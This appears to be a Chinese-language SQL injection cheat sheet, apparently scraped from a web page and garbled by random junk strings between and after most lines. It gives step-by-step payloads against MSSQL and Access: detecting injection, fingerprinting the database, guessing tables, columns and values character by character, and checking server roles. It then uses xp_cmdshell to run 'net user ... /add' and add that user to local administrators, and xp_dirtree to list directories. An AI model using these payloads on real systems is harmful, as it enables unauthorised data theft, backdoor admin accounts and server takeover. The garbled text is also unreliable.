1.判断是否有注入;and 1=1 ;and 1=2 Ps<k 2
2.初步判断是否是mssql ;and user>0 z:
+zXcTT[V
3.注入参数是字符'and [查询条件] and ''=' D6"d\Fm<
t<j_` %`8
4.搜索时没过滤参数的'and [查询条件] and '%25'=' L}'^FqO[IW
P]OUzI,
5.判断数据库系统 KXpbee
YLS*uXB&.
;and (select count(*) from sysobjects)>0 mssql $My~sN8
t*dq*(3"c
;and (select count(*) from msysobjects)>0 access PS=q):R|
rQJ\Y3.
Z3=N= xY]
V-E 77u6{0
6.猜数据库 ;and (select Count(*) from [数据库名])>0 7#Uzz"^
Mvp|S.
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 I$4>_D
'Sesh'2
/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 /a9CqK
C7f*Q[
9.(1)猜字段的ascii值(access) }%<_>b\
9XhH*tBn7(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 M%RH4%NZ0
F,Ve, 7kh
(2)猜字段的ascii值(mssql) _Vf>>tuW
UoUQ6Ij
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 TtH!5{$s
>_ G'o
10.测试权限结构(mssql) 2E`mbT,v&
7%[ YX
.}uri1k"@k
c=QN!n:
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- -@Urq>^v T
Qpj[]c5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ReL+V
T LF'7ufq
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Le{.B@2-"
atmW? Z
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .:GOKyr(~
g/\cN(X
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- !H<%X~|,
q*C-DiV
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &FJr?hY%
\=`jo$S
;and 1=(select IS_MEMBER('db_owner'));-- P=L@!F+s
]!N=Z
}LD
0\s&;@xKk
|[>yJXxEL@
11.添加mssql和系统的帐户 da_0{;wR
}B!io-}
;exec master.dbo.sp_addlogin username;-- @A<~bod
;exec master.dbo.sp_password null,username,password;--
ls7P$qq
FC||6vJth
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N9y+Psh
[hk/Rp7{
;exec master.dbo.xp_cmdshell 'net user username password )[r=(6?n
~jmI`X/
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ao[yHcAs
[tElt4uG
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ^]~!:Ej0
x8~*+ j
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- k g Rys
OdNcuiLa
Zm7,O8
KmM:V2@A$
12.(1)遍历目录 NV@$\<
m6]6!_
;create table dirs(paths varchar(100), id int) JNJ6HyCU
'5~l{3Lw
;insert dirs exec master.dbo.xp_dirtree 'c:\' wO`G_!W9
'
I!/I
;and (select top 1 paths from dirs)>0 4HX;9HPHE<
UI%4d3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K{V.N<